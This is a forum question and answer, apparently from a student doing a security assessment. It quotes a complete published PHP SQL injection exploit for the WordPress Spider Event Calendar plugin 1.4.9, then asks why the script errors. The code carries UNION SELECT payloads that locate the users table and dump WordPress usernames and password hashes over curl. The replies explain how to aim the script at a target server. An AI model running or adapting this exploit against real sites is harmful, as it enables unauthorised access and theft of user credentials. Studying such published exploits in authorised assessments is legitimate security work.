# Problem in PHP - WordPress Plugin Webdorado Spider Event Calendar 1.4.9 - SQL Injection Exploit

Tags: php, sql-injection, exploit

as part of an assessment, we were asked to an already known fail in a system and find/write the code to exploit it. I chose an SQL Injection fail, but as I executed the code (written in PHP, which I never used), I get the following error : "Please put server (without protocol) name in SRV GET variable!", which I can't understand nor solve !

Exploit Code : https://www.exploit-db.com/exploits/36061

'''

```
<?php
 
/*

# Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9  [SQL Injection]
# Date: 2015-02-12
# Exploit Author: Mateusz Lach
# Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
# Version: 1.4.9
# Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
# CVE : CWE-89
# OWASP Top10: A1-Injection


 This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.
 
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
 
    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.
 
    # Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection]
    # Date: 2015-02-12
    # Exploit Author: Mateusz Lach
    # Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
    # Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
    # Version: 1.4.9
    # Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
    # CVE : CWE-89
    # OWASP Top10: A1-Injection
 */
 
define('FETCH_PREFIX_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,(SELECT%%20CONCAT(CHAR(35,35,35,35),table_name,CHAR(35,35,35,35))%%20FROM%%20information_schema.tables%%20WHERE%%20table_name%%20LIKE%%20(%%20SELECT%%20CHAR(37,%%20117,%%20115,%%20101,%%20114,%%20115)%%20)%%20LIMIT%%201),1,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20FROM%%20DUAL;--%%20--%%20&widget=0');
 
define('FETCH_USERS_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,%%20CONCAT(CHAR(35,33,35,33,35,33,35),GROUP_CONCAT(%%20CONCAT(%%20CONCAT(user_login,CHAR(35,%%2035),user_pass))),CHAR(35,33,35,33,35,33,35)),%%201,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20as%%20fakeGroup%%20FROM%%20%s%%20GROUP%%20BY%%20fakeGroup;--%%20&widget=0');
 
define('FAKE_ID_TO_SEARCH', 12345677654321);
define('PATTERN_TO_SEARCH', 'ev_ids='.FAKE_ID_TO_SEARCH);
define('PATTERN_TO_SEARCH_USERS', '#!#!#!#');
define('ROW_SEPARATOR', ',');
define('FIELD_SEPARATOR', '##');
$server = $_GET['SRV'];
if (empty($server))
{
    echo 'Please put server (without protocol) name in SRV GET variable!';
}
else
{
    $fullURL = sprintf(FETCH_PREFIX_URL, $server, $server, FAKE_ID_TO_SEARCH);
    $prefixCurl = curl_init($fullURL);
    curl_setopt($prefixCurl, CURLOPT_RETURNTRANSFER, true);
    $result = curl_exec($prefixCurl);
    if (stripos($result, PATTERN_TO_SEARCH) !== false)
    {
        preg_match('/####[a-zA-Z\_0-9]*####/', $result, $tableNames);
        $tableName = str_replace('####', '', $tableNames[0]);
        echo 'tableName: '.$tableName.'<BR/>';
        $fullURL = sprintf(FETCH_USERS_URL, $server, $server, FAKE_ID_TO_SEARCH, $tableName);
        $usersCurl = curl_init($fullURL);
        curl_setopt($usersCurl, CURLOPT_RETURNTRANSFER, true);
        $result = curl_exec($usersCurl);  
        if (stripos($result, PATTERN_TO_SEARCH) !== false)
        {
            $from = stripos($result, PATTERN_TO_SEARCH_USERS);
            $to = stripos($result, PATTERN_TO_SEARCH_USERS, $from + strlen(PATTERN_TO_SEARCH_USERS));
            $result = substr($result, $from, $to-$from);
            echo '<table><tr><td>'.str_replace(FIELD_SEPARATOR, '</td><td>', str_replace(ROW_SEPARATOR, '</td></tr><tr><td>', str_replace(PATTERN_TO_SEARCH_USERS, '', $result))).'</td></tr></table>';
        }
        else
        {
            echo 'Table name fetched, but not users - try to rewrite exploit :-(';
        }
    }
    else
    {
        echo 'NOT vulnerable :-(';
    }
}
```

'''

Comment: It's  just a validation error. It's telling you to put a parameter value like `SRV=someServerName` into the query string of the URL you are using to execute the script. The server name is required for the curl request, so it knows where to send the request to.

Answer (score 1):

You can do one of two things:

A. Modify the code of this file you have to point to the server you want to query:

Change:

```
$server = $_GET['SRV'];
```

To:

```
$server = 'theservertotest.com';
```

B. Pass the server into the query string of the URL where you are running this PHP file:

```
https://mysqlinject-testsite.com/exploit_test.php?SRV=theservertotest.com
```